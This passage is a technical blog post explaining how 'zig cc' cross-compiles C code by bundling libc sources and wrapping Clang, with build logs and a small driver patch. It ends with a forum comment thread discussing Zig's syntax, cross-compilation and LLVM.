make[1]: Entering directory '/home/andy/Downloads/LuaJIT/src'
HOSTCC    host/minilua.o
HOSTLINK  host/minilua
DYNASM    host/buildvm_arch.h
HOSTCC    host/buildvm.o
HOSTCC    host/buildvm_asm.o
HOSTCC    host/buildvm_peobj.o
HOSTCC    host/buildvm_lib.o
HOSTCC    host/buildvm_fold.o
HOSTLINK  host/buildvm
BUILDVM   lj_vm.S
ASM       lj_vm.o
CC        lj_gc.o
BUILDVM   lj_ffdef.h
CC        lj_err.o
CC        lj_char.o
BUILDVM   lj_bcdef.h
CC        lj_bc.o
CC        lj_obj.o
CC        lj_buf.o
CC        lj_str.o
CC        lj_tab.o
CC        lj_func.o
CC        lj_udata.o
CC        lj_meta.o
CC        lj_debug.o
CC        lj_state.o
CC        lj_dispatch.o
CC        lj_vmevent.o
CC        lj_vmmath.o
CC        lj_strscan.o
CC        lj_strfmt.o
CC        lj_strfmt_num.o
CC        lj_api.o
CC        lj_profile.o
CC        lj_lex.o
CC        lj_parse.o
CC        lj_bcread.o
CC        lj_bcwrite.o
CC        lj_load.o
CC        lj_ir.o
CC        lj_opt_mem.o
BUILDVM   lj_folddef.h
CC        lj_opt_fold.o
CC        lj_opt_narrow.o
CC        lj_opt_dce.o
CC        lj_opt_loop.o
CC        lj_opt_split.o
CC        lj_opt_sink.o
CC        lj_mcode.o
CC        lj_snap.o
CC        lj_record.o
CC        lj_crecord.o
BUILDVM   lj_recdef.h
CC        lj_ffrecord.o
CC        lj_asm.o
CC        lj_trace.o
CC        lj_gdbjit.o
CC        lj_ctype.o
CC        lj_cdata.o
CC        lj_cconv.o
CC        lj_ccall.o
CC        lj_ccallback.o
CC        lj_carith.o
CC        lj_clib.o
CC        lj_cparse.o
CC        lj_lib.o
CC        lj_alloc.o
CC        lib_aux.o
BUILDVM   lj_libdef.h
CC        lib_base.o
CC        lib_math.o
CC        lib_bit.o
CC        lib_string.o
CC        lib_table.o
CC        lib_io.o
CC        lib_os.o
CC        lib_package.o
CC        lib_debug.o
CC        lib_jit.o
CC        lib_ffi.o
CC        lib_init.o
AR        libluajit.a
CC        luajit.o
BUILDVM   jit/vmdef.lua
DYNLINK   libluajit.so
libluajit.so
LINK      luajit
warning: unsupported linker arg: -E
luajit
OK        Successfully built LuaJIT
make[1]: Leaving directory '/home/andy/Downloads/LuaJIT/src'
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ file ./src/luajit 
./src/luajit: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 2.0.0, with debug_info, not stripped

It worked! Will it run in QEMU though?

[~/Downloads/LuaJIT]$ qemu-aarch64 -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu ./src/luajit
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON fold cse dce fwd dse narrow loop abc sink fuse
> print(4 + 3)
7
> 

Amazing. QEMU never fails to impress me.

Before we move on, I want to show one more thing. You can see above, in order to run the foreign-architecture binary, I had to pass -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu. This is due to the binary being dynamically linked. You can confirm this with the output from file above where it says: dynamically linked, interpreter /lib/ld-linux-aarch64.so.1

Often, when cross-compiling, it is useful to make a static binary. In the case of Linux, for example, this will make the resulting binary able to run on any Linux distribution, rather than only ones with a hard-coded glibc dynamic linker path of /lib/ld-linux-aarch64.so.1.

We can accomplish this by targeting musl rather than glibc:

[~/Downloads/LuaJIT]$ git clean -qxfd
[~/Downloads/LuaJIT]$ export CC='zig cc -target aarch64-linux-musl'
[~/Downloads/LuaJIT]$ make CC='$CC' CXX='$CXX' HOST_CC='$HOST_CC' TARGET_STRIP='echo'
==== Building LuaJIT 2.1.0-beta3 ====
(same output)
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ file src/luajit
src/luajit: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, not stripped
[~/Downloads/LuaJIT]$ qemu-aarch64 ./src/luajit
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON fold cse dce fwd dse narrow loop abc sink fuse
> print(11 + 22)
33

Here you can see the file command reported statically linked, and in the qemu command, the -L parameter was not needed.

Use Cases of `zig cc`

Alright, so I've given you a taste of what zig cc can do, but now I will list explicitly what I consider to be the use cases:

Experimentation

Sometimes you just want a tool that you can use to try out different things. It can quickly answer questions such as 'What assembly does this code generate on MIPS vs ARM?'. The widely popular Compiler Explorer serves this purpose.

zig cc provides a lightweight tool which can also answer questions such as, 'What happens if I swap out glibc for musl?' and 'How big is this executable when cross-compiled for Windows?'. Here's me using Zig to quickly find out what the maximum UDP packet size is on Linux.

Since Zig is so easy to install - and it actually works everywhere without patches, even Linux distributions such as NixOS - it can often be a more convenient tool for running quick C test programs on your computer.

At the time of this writing, LLVM 10 was just released two hours ago. It will take days or weeks for it to become available in various system package managers. But you can already download a master branch build of Zig and play with the new features of Clang/LLVM 10. For example, improved RISC-V support!

[email protected] ~/tmp> zig cc -o hello hello.c -target riscv64-linux-musl
[email protected] ~/tmp> qemu-riscv64 ./hello
Hello, World!

Bundling a C compiler as part of a larger project

With Zig tarballs weighing in at under 45 MiB, zero system dependencies, no configuration, and MIT license, it makes for an ideal candidate when you need to bundle a C compiler along with another project.

For example, maybe you have a programming language that compiles to C. Zig is an obvious choice for what C compiler to ship with your language.

Or maybe you want to make a batteries-included IDE that ships with a compiler.

Lightweight alternative to a cross compilation environment

If you're trying to build something with a large dependency tree, you'll probably want to use a full cross compilation environment, such as mxe.cc or musl.cc.

But if you don't need such a sledgehammer, zig cc could be a useful alternative, especially if your goal is to compile for N different targets. Consider that musl.cc lists different tarballs for each architecture, each weighing in at roughly 85 MiB. Meanwhile Zig weighs in at 45 MiB and it supports all those architectures, plus glibc and Windows.

An alternative to installing MSVC on Windows

You could spend days - literally! - waiting for Microsoft Visual Studio to install, or you could install Zig and VS Code in a matter of minutes.

Under the Hood

If zig cc is built on top of Clang, why doesn't Clang just do this? What exactly is Zig doing on top of Clang to make this work?

The answer is, a lot, actually. I'll go over how it works here.

compiler-rt

compiler-rt is a library that provides 'polyfill' implementations of language-supported features when the target does not have machine code instructions for it. For example, compiler-rt has the function __muldi3 to perform signed 64-bit integer multiplication on architectures that do not have a 64-bit wide integer multiplication instruction.

In the GNU world, compiler-rt is named libgcc.

Most C compilers ship with this library pre-built for the target. For example, on an Ubuntu (Bionic) system, with the build-essential package installed, you can find this at /lib/x86_64-linux-gnu/libgcc_s.so.1.

If you download clang+llvm-9.0.1-x86_64-linux-gnu-ubuntu-16.04.tar.xz and take a look around, clang actually does not even ship with compiler-rt. Instead, it relies on the system libgcc noted above. This is one reason that this tarball is Ubuntu-specific and does not work on other Linux distributions, FreeBSD's Linuxulator, or WSL, which have system files in different locations.

Zig's strategy with compiler-rt is that we have our own implementation of this library, written in Zig. Most of it is ported from LLVM's compiler-rt project, but we also have some of our own improvements on top of this.

Anyway, rather than depending on system compiler-rt being installed, or shipping a pre-compiled library, Zig ships its compiler-rt in source form, and lazily builds compiler-rt for the compilation target, and then caches the result using the caching system discussed above.

Zig's compiler-rt is not yet complete. However, completing it is a prerequisite for releasing Zig version 1.0.0.

libc

When C code calls printf, printf has to be implemented somewhere, and that somewhere is libc.

Some operating systems, such as FreeBSD and macOS, have a designated system libc, and it is the kernel syscall interface. On others, such as Windows and Linux, libc is optional, and therefore there are multiple options of which libc to use, if any.

As of the time of this writing, Zig can provide libcs for the following targets:

[email protected] ~> zig targets | jq .libc
[
  'aarch64_be-linux-gnu',
  'aarch64_be-linux-musl',
  'aarch64_be-windows-gnu',
  'aarch64-linux-gnu',
  'aarch64-linux-musl',
  'aarch64-windows-gnu',
  'armeb-linux-gnueabi',
  'armeb-linux-gnueabihf',
  'armeb-linux-musleabi',
  'armeb-linux-musleabihf',
  'armeb-windows-gnu',
  'arm-linux-gnueabi',
  'arm-linux-gnueabihf',
  'arm-linux-musleabi',
  'arm-linux-musleabihf',
  'arm-windows-gnu',
  'i386-linux-gnu',
  'i386-linux-musl',
  'i386-windows-gnu',
  'mips64el-linux-gnuabi64',
  'mips64el-linux-gnuabin32',
  'mips64el-linux-musl',
  'mips64-linux-gnuabi64',
  'mips64-linux-gnuabin32',
  'mips64-linux-musl',
  'mipsel-linux-gnu',
  'mipsel-linux-musl',
  'mips-linux-gnu',
  'mips-linux-musl',
  'powerpc64le-linux-gnu',
  'powerpc64le-linux-musl',
  'powerpc64-linux-gnu',
  'powerpc64-linux-musl',
  'powerpc-linux-gnu',
  'powerpc-linux-musl',
  'riscv64-linux-gnu',
  'riscv64-linux-musl',
  's390x-linux-gnu',
  's390x-linux-musl',
  'sparc-linux-gnu',
  'sparcv9-linux-gnu',
  'wasm32-freestanding-musl',
  'x86_64-linux-gnu',
  'x86_64-linux-gnux32',
  'x86_64-linux-musl',
  'x86_64-windows-gnu'
]

In order to provide libc on these targets, Zig ships with a subset of the source files for these projects:

For each libc, there is a process for upgrading to a new release. This process is a sort of pre-processing step. We still end up with source files, but we de-duplicate non-multi-arch source files into multi-arch source files.

glibc

glibc is the most involved. The first step is building glibc for every target that it supports, which takes upwards of 24 hours and 74 GiB of disk space.

From here, the process_headers tool inspects all the header files from all the targets, and identifies which files are the same across all targets, and which header files are target-specific. They are then sorted into the corresponding directories in Zig's source tree, in:

  • lib/libc/include/generic-glibc/
  • lib/libc/include/$ARCH-linux-$ABI/ (there are multiple of these directories)

Additionally, Linux header files are not included in glibc, and so the same process is applied to Linux header files, with the directories:

  • lib/libc/include/any-linux-any/
  • lib/libc/include/$ARCH-linux-any/

That takes care of the header files, but now we have the problem of dynamic linking against glibc, without touching any system files.

For this, we have the update_glibc tool. Given the path to the glibc source directory, it finds all the .abilist text files and uses them to produce 3 simple but crucial files:

  • vers.txt - the list of all glibc versions.
  • fns.txt - the list of all symbols that glibc provides, followed by the library it appears in (for example libm, libpthread, libc, librt).
  • abi.txt - for each target, for each function, tells which versions of glibc, if any, it appears in.

Together, these files amount to only 192 KB (27 KB gzipped), and they allow Zig to target any version of glibc.

Yes, I did not make a typo there. Zig can target any of the 42 versions of glibc for any of the architectures listed above. I'll show you:

[email protected] ~/tmp> cat rand.zig 
const std = @import('std');
pub fn main() anyerror!void {
    var buf: [10]u8 = undefined;
    _ = std.c.getrandom(&buf, buf.len, 0);
    std.debug.warn('random bytes: {x}\n', .{buf});
}
[email protected] ~/tmp> zig build-exe rand.zig -lc -target native-native-gnu.2.25
[email protected] ~/tmp> ./rand
random bytes: e2059382afb599ea6d29
[email protected] ~/tmp> zig build-exe rand.zig -lc -target native-native-gnu.2.24
lld: error: undefined symbol: getrandom
>>> referenced by rand.zig:5 (/home/andy/tmp/rand.zig:5)
>>>               ./rand.o:(main.0)

Sure enough, if you look at the man page for getrandom, it says:

Support was added to glibc in version 2.25.

When no explicit glibc version is requested, and the target OS is the native (host) OS, Zig detects the native glibc version by inspecting the Zig executable's own dynamically linked libraries, looking for glibc, and checking the version. It turns out you can look for libc.so.6 and then readlink on that, and it will look something like libc-2.27.so. When this strategy does not work, Zig looks at /usr/bin/env, looking for the same thing. Since this file path is hard-coded into countless shebang lines, it's a pretty safe bet to find out the dynamic linker path and glibc version (if any) of the native system!

zig cc currently does not provide a way to choose a specific glibc version (because C compilers do not provide a way), and so Zig chooses the native version for compiling natively, and the default (2.17) for cross-compiling. However, I'm sure this problem can be solved, even when using zig cc. For example, maybe it could support an environment variable, or simply introduce an extra command line option that does not conflict with any Clang options.

When you request a certain version of glibc, Zig uses those text files noted above to create dummy .so files to link against, which contain exactly the correct set of symbols (with appropriate name mangling) based on the requested version. The symbols will be resolved at runtime, by the dynamic linker on the target platform.

In this way, most of libc in the glibc case resides on the target file system. But not all of it! There are still the 'C runtime start files':

  • Scrt1.o
  • crti.o
  • crtn.o

These are statically compiled into every binary that dynamically links glibc, and their ABI is therefore Very Very Stable.

And so, Zig bundles a small subset of glibc's source files needed to build these object files from source for every target. The total size of this comes out to 1.4 MiB (252 KB gzipped). I do think there is some room for improvement here, but I digress.

There are a couple of patches to this small subset of glibc source files, which simplify them to avoid including too many .h files, since the end result that we need is some bare bones object files, and not all of glibc.

And finally, we certainly do not ship the build system of glibc with Zig! I manually inspected, audited, and analyzed glibc's build system, and then by hand wrote code in the Zig compiler which hooks into Zig's caching system and performs a minimal build of only these start files, as needed.

musl

The process for preparing musl to ship with Zig is much simpler by comparison.

It still involves building musl for every target architecture that it supports, but in this case only the install-headers target has to be run, and it takes less than a minute, even to do it for all targets.

The same process_headers tool tool used for glibc headers is used on the musl headers:

  • lib/libc/include/generic-musl/
  • lib/libc/include/$ARCH-linux-$ABI/ (there are multiple of these directories)

Unlike glibc, musl supports building statically. Zig currently assumes a static libc when musl is chosen, and does not support dynamically linking against musl, although that could potentially be added in the future.

And so for musl, zig actually bundles most - but still not all - of musl's source files. Everything in arch, crt, compat, src, and include gets copied in.

Again much like glibc, I carefully studied musl's build system, and then hand-coded logic in the Zig compiler to build these source files. In musl's case it is simpler - just a bit of logic having to do with the file extension, and whether to override files with an architecture-specific file. The only file that needs to be patched (by hand) is version.h, which is normally generated during the configure phase in musl's build system.

I really appreciate Rich Felker's efforts to make musl simple to utilize in this way, and he has been incredibly helpful in the #musl IRC channel when I ask questions. I proudly sponsor Rich Felker for $150/month.

mingw-w64

mingw-w64 was an absolute joy to support in Zig. The beautiful thing about this project is that they have already been transitioning into having one set of header files that applies to all architectures (using #ifdefs only where needed). One set of header files is sufficient to support all four architectures: arm, aarch64, x86, and x86_64.

So for updating headers, all we have to do is build mingw-w64, then:

mv $INSTALLPREFIX/include $ZIGSRC/lib/libc/include/any-windows-any

After doing this for all 3 libcs, the libc/include directory looks like this:

aarch64_be-linux-any   i386-linux-musl           powerpc-linux-any
aarch64_be-linux-gnu   mips64el-linux-any        powerpc-linux-gnu
aarch64-linux-any      mips64el-linux-gnuabi64   powerpc-linux-musl
aarch64-linux-gnu      mips64el-linux-gnuabin32  riscv32-linux-any
aarch64-linux-musl     mips64-linux-any          riscv64-linux-any
any-linux-any          mips64-linux-gnuabi64     riscv64-linux-gnu
any-windows-any        mips64-linux-gnuabin32    riscv64-linux-musl
armeb-linux-any        mips64-linux-musl         s390x-linux-any
armeb-linux-gnueabi    mipsel-linux-any          s390x-linux-gnu
armeb-linux-gnueabihf  mipsel-linux-gnu          s390x-linux-musl
arm-linux-any          mips-linux-any            sparc-linux-gnu
arm-linux-gnueabi      mips-linux-gnu            sparcv9-linux-gnu
arm-linux-gnueabihf    mips-linux-musl           x86_64-linux-any
arm-linux-musl         powerpc64le-linux-any     x86_64-linux-gnu
generic-glibc          powerpc64le-linux-gnu     x86_64-linux-gnux32
generic-musl           powerpc64-linux-any       x86_64-linux-musl
i386-linux-any         powerpc64-linux-gnu
i386-linux-gnu         powerpc64-linux-musl

When Zig generates a C command line to send to clang, it puts the appropriate include paths using -I depending on the target. For example, if the target is aarch64-linux-musl, then the following command line parameters are appended:

  • -I$LIB/libc/include/aarch64-linux-musl
  • -I$LIB/libc/include/aarch64-linux-any
  • -I$LIB/libc/include/generic-musl

Anyway back to mingw-w64.

Again, Zig includes a subset of source files from mingw-w64 with a few patches applied to make things compile successfully.

The Zig compiler code that builds mingw-w64 from source files emulates only the parts of the build system that are needed for this subset. This includes preprocessing .def.in files to get .def files, and then in-turn using LLD to generate .lib files from the .def files, which allows Zig to provide .lib files for any Windows DLL, such as kernel32.dll or even opengl32.dll.

Invoking Clang Without a System Dependency

Since Zig already links against Clang libraries for the translate-c feature, it was not much more cost to expose the main() entry point from Zig. So that's exactly what we do:

  • llvm-project/clang/tools/driver/driver.cpp is copied to $ZIGGIT/src/zig_clang_driver.cpp
  • llvm-project/clang/tools/driver/cc1_main.cpp is copied to $ZIGGIT/src/zig_clang_cc1_main.cpp
  • llvm-project/clang/tools/driver/cc1as_main.cpp is copied to $ZIGGIT/src/zig_clang_cc1as_main.cpp

The following patch is applied:

--- a/src/zig_clang_driver.cpp
+++ b/src/zig_clang_driver.cpp
@@ -206,8 +205,6 @@
                     void *MainAddr);
 extern int cc1as_main(ArrayRef<const char *> Argv, const char *Argv0,
                       void *MainAddr);
-extern int cc1gen_reproducer_main(ArrayRef<const char *> Argv,
-                                  const char *Argv0, void *MainAddr);
 
 static void insertTargetAndModeArgs(const ParsedClangName &NameParts,
                                     SmallVectorImpl<const char *> &ArgVector,
@@ -330,19 +327,18 @@
   if (Tool == '-cc1as')
     return cc1as_main(makeArrayRef(ArgV).slice(2), ArgV[0],
                       GetExecutablePathVP);
-  if (Tool == '-cc1gen-reproducer')
-    return cc1gen_reproducer_main(makeArrayRef(ArgV).slice(2), ArgV[0],
-                                  GetExecutablePathVP);
   // Reject unknown tools.
   llvm::errs() << 'error: unknown integrated tool '' << Tool << ''. '
                << 'Valid tools include '-cc1' and '-cc1as'.\n';
   return 1;
 }
 
-int main(int argc_, const char **argv_) {
+extern 'C' int ZigClang_main(int argc_, const char **argv_);
+int ZigClang_main(int argc_, const char **argv_) {
   noteBottomOfStack();
   llvm::InitLLVM X(argc_, argv_);
-  SmallVector<const char *, 256> argv(argv_, argv_ + argc_);
+  size_t argv_offset = (strcmp(argv_[1], '-cc1') == 0 || strcmp(argv_[1], '-cc1as') == 0) ? 0 : 1;
+  SmallVector<const char *, 256> argv(argv_ + argv_offset, argv_ + argc_);
 
   if (llvm::sys::Process::FixupStandardFileDescriptors())
     return 1;

This disables some cruft, and then renames main to ZigClang_main so that it can be called like any other function. Next, in Zig's actual main, it looks for clang as the first parameter, and calls it.

So, zig clang is low-level undocumented API that Zig exposes for directly invoking Clang. But zig cc is much higher level than that. When Zig needs to compile C code, it invokes itself as a child process, taking advantage of zig clang. zig cc on the other hand, has a more difficult job: it must parse Clang's command line options and map those to the Zig compiler's settings, so that ultimately zig clang can be invoked as a child process.

Parsing Clang Command Line Options

When using zig cc, Zig acts as a proxy between the user and Clang. It does not need to understand all the parameters, but it does need to understand some of them, such as the target. This means that Zig must understand when a C command line parameter expects to 'consume' the next parameter on the command line.

For example, -z -target would mean to pass -target to the linker, whereas -E -target would mean that the next parameter specifies the target.

Clang has a long list of command line options and so it would be foolish to try to hard-code all of them.

Fortunately, LLVM has a file 'options.td' which describes all of its command line parameter options in some obscure format. But fortunately again, LLVM comes with the llvm-tblgen tool that can dump it as JSON format.

Zig has an update_clang_options tool which processes this JSON dump and produces a big sorted list of Clang's command line options.

Combined with a list of 'known options' which correspond to Zig compiler options, this is used to make an iterator API that zig cc uses to parse command line parameters and instantiate a Zig compiler instance. Any Clang options that Zig is not aware of are forwarded to Clang directly. Some parameters are handled specially.

Linking

This part is pretty straightforward. Zig depends on LLD for linking rather than shelling out to the system linker, like GCC and Clang do.

When you use -o with zig cc, Clang is not actually acting as a linker driver here. Zig is still the linker driver.

Everybody Wins

Now that I've spent this entire blog article comparing Zig and Clang as if they are competitors, let me make it absolutely clear that both of these are harmonious, mutually beneficial open-source projects. It's pretty obvious how Clang and the entire LLVM project are massively beneficial to the Zig project, since Zig builds on top of them.

But it works the other way, too.

With Zig's focus on cross-compiling, its test suite has been expanding rapidly to cover a large number of architectures and operating systems, leading to dozens of bugs reported upstream and patches sent, including, for example:

Everybody wins.

This is still experimental!

I have only recently landed zig cc support last week, and it is still experimental. Please do not expect it to be production quality yet.

Zig's 0.6.0 release is right around the corner, scheduled for April 13th. I will be sure to provide an update on the release notes on how stable and robust you can expect zig cc to be in the 0.6.0 release.

There are some follow-up issues related to zig cc which are still open:

As always, Contributions are most welcome.

💖 Sponsor Zig 💖

Sponsor Andrew Kelley on GitHub

If you're reading this and you already sponsor me, thank you so much! I wake up every day absolutely thrilled that I get to do this for my full time job.

As Zig has been gaining popularity, demands for my time have been growing faster than funds to hire another full-time programmer. Every recurring donation helps, and if the funds keep growing then soon enough the Zig project will have two full-time programmers.

That's all folks. I hope you and your loved ones are well.




All Comments: [-] | anchor

ojosilva(3579) 3 days ago [-]

I really love Zig, it can apparently replace our C toolchain with brilliant, static cross-compilation, including s390 Linux support (mainframe Linux!).

My only gripe is that the syntax and stdlib, although practical and to the point, seem to suffer from some strange choices that somewhat clash with its own, albeit early, 'zen' of simplicity.

- '@' prefix for builtin functions, a little strange and macro-looking for my eyes. Why not just plain keywords? And cleanup some of it: `@cos`, `@sin`, also feel like too much when they are already in the stdlib I believe.

- |x| for/while list bind var, why not just for(x in y)? Surrounding pipes are really annoying to type in some foreign keyboards and feel totally needless in 99% of the places.

- inconsistent required parenthesis predicates in block statements in 'test STR {}' vs. 'if() {}'. Either require parenthesis or don't, I don't really care which one.

- prefixed type signatures, `?[]u32` feels a little off / harder to read.

- comment-looking, noisy prefixed multi-line slashes `\\`.

- the need to dig deep into 'std' to get your everyday lib functions out 'std.io.getStdOut().outStream().print()'. `@import('std')` repeated many times.

- consider implementing destructuring syntax early-on to deal with so much struct member depth ie `const { x, y } = p` or `const { math: { add, mul } } = @import('std')`.

- anonymous list syntax with `.{}` is eye catching as the dot implies 'struct member' in Zig, but then the dot is everywhere, specially when you do anonymous structs `.{.x=123}`, maybe consider `[1,2,3]` and `[x=123]` given brackets are being used for array length annotation anyways ie `array[]`.

- `.` suffix for lvalue and rvalue pointer deref. Also `'str'.` is a byte array unroll if I understood correctly. Here `f.* = Foo{ .float = 12.34 };` looks like it's doing something with `.` to get to the struct members but it's actually just a pointer deref. Also looks like a file or import lib wildcard (`file.*`) to my eyes.

- field access by string clunky `@field(p, 'x') = 123;`, with an odd function as lvalue.

Sorry for the criticism, we're seriously checking out Zig for migrating a large C codebase and replacing future C projects. Although we can live with these quirks, they just make the language look a little random and NIH and that worries me and the team. For instance, Golang has great syntax and semantic consistency which is a boost on project steering quality and assured, life-long onboarding for newbees. Please consider widening the spec peer-review process, maybe in a separate Github repo with markdown proposal writeups. Discussing syntax seems superficial given many project and compiler feats under the hood, but it can become sorta 'genetic disease' and a deal-breaker for the project on the long run!

This is a pre-release version I know, but it's just that my hopes are really up for Zig as Golang, C++ and Rust never really did it for us as a multi-target sw toochain for various reasons.

speps(2811) 3 days ago [-]

No for loops with a constant count is also a very strange choice

    for (([100]void)(undefined)) |_, verb| {
And I've been bitten multiple times with line endings having to be \n only.
jessermeyer(10000) 3 days ago [-]

Feel free to raise these as Issue's on Zig's Issue tracker on Github, or comment on those which have previously been raised. If you have a good reason for it being a certain way, write up why and it may be considered as proposal.

chronogram(10000) 4 days ago [-]

Perhaps I missed this from the blog post since it's unfamiliar to me. Can you compile Linux with this? Like, could you really straight up use this is a drop-in replacement for a whole Gentoo system?

loeg(3931) 4 days ago [-]

Historically the Linux kernel used GCC extensions that Clang did not support, and this is just a thin shim around the ordinary Clang frontend, so to the extent that's still a problem: no.

Otherwise: yeah. It's just clang's main function with a different name slapped on. Linking semantics may differ slightly which could be problematic. But in theory, yes.

AndyKelley(1111) 4 days ago [-]

I'm guessing the build system of Linux depends on more than just a C compiler, and that's why the answer to the question is 'no'. If the build system of Linux only depends on a C compiler then my answer would be:

That would be a nice stress test, which would undoubtedly lead to bugs discovered. After enough bugs fixed, the answer would be 'yes'.

I'll try it!

emmanueloga_(4280) 4 days ago [-]

The cross compiling features of Zig look fantastic! Installation is so easy, just downloading and extracting a single file.

Should every compiler stack have prioritized cross compilation over other features? (I vote: YES). Cross compiling programs has always been a PITA for most languages.

It would be great if Zig cc could be paired with vcpkg [1] for a nice cross-compiling development environment. Looks like vckpg requires a C++ compiler though.

1: https://github.com/microsoft/vcpkg

est31(3611) 4 days ago [-]

Note that on linux hosts at least, for most target platforms, being able to cross compile with clang is only one single install of the right packages away.

wyldfire(580) 4 days ago [-]

I think a problem comes when you want to distribute your compiler potentially independent from your OS and/or linker and/or C library.

But it's also fair to say that if we had always considered those things as inseparable parts of the 'compiler suite' that might have made everyone better off.

ncmncm(4233) 4 days ago [-]

Portability depends on a great deal more than just object code formats. The list of OS environment functions to call to achieve anything useful is radically different from one target to another.

This is what makes porting hard work. Cross-compiling is only the first step of a long trip.

Hello71(4168) 3 days ago [-]

Which reasonably-popular modern languages can be reasonably said to have ignored cross compilation? Interpreted languages like JavaScript and Python obviously don't have any problem, JIT languages like .NET and Java explicitly have a cross-platform layer, and modern compiled languages like Go and Rust specifically have cross-compilation as a goal. Rust still needs a libc though, but that's not Rust's fault, that's the result of trying to work together with the system instead of DIYing everything. (see: problems with Go doing system calls on BSDs, Solaris, etc)

You can't look at C which started in the 1970s and C++ which started in the 1980s and have expected them to even consider cross-compilation, when Autoconf wasn't even released until 1991.

keithnz(3967) 4 days ago [-]

can zig compile to C? so many languages would be very useful if they could compile to C for embedded systems as native compilers are very unlikely for new ( or even old ) languages

vips7L(3924) 4 days ago [-]

When you compile to object files zig will generate C header files that you can use when linking. Granted this won't help with embedded systems where zig can't compile to.

hryx(10000) 4 days ago [-]

Compiling to C source isn't planned for the reference Zig compiler, as far as I know. It's more interested in helping people moving people off of C (see `zig translate-c`).

But for supporting more esoteric targets you might be interested in the goals of this ultra-early-stage assembler. ('Planned targets: All of them.')

https://github.com/andrewrk/zasm

Y_Y(3875) 4 days ago [-]

What are the limitations? Speed? External libraries?

ifreund(10000) 4 days ago [-]

Afaik the only drawback is that this functionality is very new and still has some open issues (linked at the end of the post). As stated there are no dependencies for Zig and it is shipped in relatively small tarballs which can be downloaded from the Zig website: https://ziglang.org/download/

audunw(10000) 4 days ago [-]

The limitation is maturity/stability I'd say. Zig is still pre-1.0

Speed? Using Zig should be faster than using Clang directly in many cases. You get the caching system, and I think you can do more complex builds without having to resort to multiple Clang commands from a makefile.

Not sure what you mean with external libraries.

Shoop(4253) 4 days ago [-]

Really incredible work and it's been very fun to follow along. The streams where Andrew did the last part of this work can be seen here: [1], [2].

I am really happy that someone is making the effort to steadily simplify systems programming rather than make it more complicated. Linux goes to such incredible lengths to be bug-for-bug backwards compatible, but then the complexities of all of our layers of libcs, shared libraries, libsystemd, dbus, etc cause unnecessary pain and breakage at every level. Furthermore, cross-compiling C code across different architectures on Linux is far harder than it needs to be. I have a feeling that there wouldn't be as much interest in the steady stream of sandboxes and virtual machines (JVM, NaCl, PNaCl, flatpak, docker, WebAssembly) if we could just simplify the layers and layers of cruft and abstractions in compiler toolchains, libc implementations, and shared libraries. Practically every laptop and server processor use the exact same amd64 architecture, but we have squandered this opportunity by adding leaky abstractions at so many levels. I can't wait until installing a program on linux is as simple as downloading a static executable and just running it and I hope zig brings this future.

[1] https://www.youtube.com/watch?v=2u2lEJv7Ukw [2] https://www.youtube.com/watch?v=5S2YArCx6vU

AnIdiotOnTheNet(4030) 3 days ago [-]

> I can't wait until installing a program on linux is as simple as downloading a static executable and just running it and I hope zig brings this future.

For the record: This is pretty close to what AppImage is today. It's not quite 100% because userland fragmentation is so ridiculously bad that it doesn't work out of the box on a few of them, but I personally really wish all Linux software was distributed that way (or static like Zig).

Wowfunhappy(3954) 4 days ago [-]

Linux and GCC today have the ability to compile and run fully static executables, I don't understand why this isn't done...

SaxonRobber(10000) 3 days ago [-]

How does Zig compare with Nim and Rust? (putting aside the differences in adoption)

rhodysurf(10000) 3 days ago [-]

Manual memory management is the most important difference

nrclark(10000) 4 days ago [-]

Zig looks super cool. I've been wanting to experiment with it for some system software.

Are there any guides anywhere for calling libc functions from zig? I'm interested in fork/join, chmod, fcntl, and that kind of thing. Do I just import the C headers manually? Or is there some kind of built-in libc binding?

AndyKelley(1111) 4 days ago [-]

For POSIX, you can use the standard library:

std.os.chmod

std.os.fcntl

Better yet, use the higher level cross platform abstractions. For example instead of fork/join,

std.Thread.create

std.Thread.wait

These will work in Windows as well as POSIX.

dnautics(4313) 4 days ago [-]

I think you can call libc by importing the C headers 'automagically' but zig does also give you some of these things in its (admittedly still poorly documented) std lib:

std.os.fork: https://github.com/ziglang/zig/blob/master/lib/std/os.zig#L2... std.os.fcntl: https://github.com/ziglang/zig/blob/master/lib/std/os.zig#L3...

fwsgonzo(10000) 4 days ago [-]

Looks very cool! Did not see 32-bit RISC-V on the list though, so wondering about that. I would have liked to use Zig cc to build 32-bit RISC-V binaries fast, if that is possible. Doesn't matter if they are freestanding.

AndyKelley(1111) 4 days ago [-]

You can indeed use zig to make riscv32-freestanding binaries (in both zig and C). What is not available is `-lc` for this target.

fizixer(10000) 3 days ago [-]

llvm is a bloated hot-mess of a compilation framework, built on a bloated hot-mess of a language (C++).

Folks who have achieved great things with llvm (and C++) have done so 'despite' what they used, not 'because of' it.

This has been my conviction for the past 10 years, and I'm glad I never had to touch llvm with a ten foot pole.

I had no doubts it'll soon be surpassed by a common-sense no-bullshit tool-chain.

Has Zig cc achieved that? Great. No? It will or someone (or I) will develop an alternative that will.

yellowapple(4306) 3 days ago [-]

> This has been my conviction for the past 10 years, and I'm glad I never had to touch llvm with a ten foot pole.

Out of curiosity: what do you touch with a ten foot pole? I'd be hard-pressed to call GCC or MSVC much better in that regard, and I can think of very few others that are in use anymore.

I mean, I've definitely dreamt about using SBCL or Clozure for things other than Lisp (seeing as they both include their own compilers not dependent on GCC/LLVM), but I've seen effectively zero effort in that direction.

throwaway17_17(10000) 3 days ago [-]

I'm not arguing that certain people using particular standards could consider LLVM bloated and I'm certainly not going to argue that by certain standards C++ could be considered bloated. But for users of LLVM, be it via clang or Zig cc or GHC, it seems to work just fine. Are your complaints from the perspective of a compiler dev (or a general dev who wants to be able to more easily open up and tune a compiler) or are they just as a user? Also, for native binary compilation of performance sensitive applications, how many options are there in common use for the major languages? Your opinion seems pretty severe, so I'm just trying to see why that is.

saagarjha(10000) 3 days ago [-]

> This has been my conviction for the past 10 years

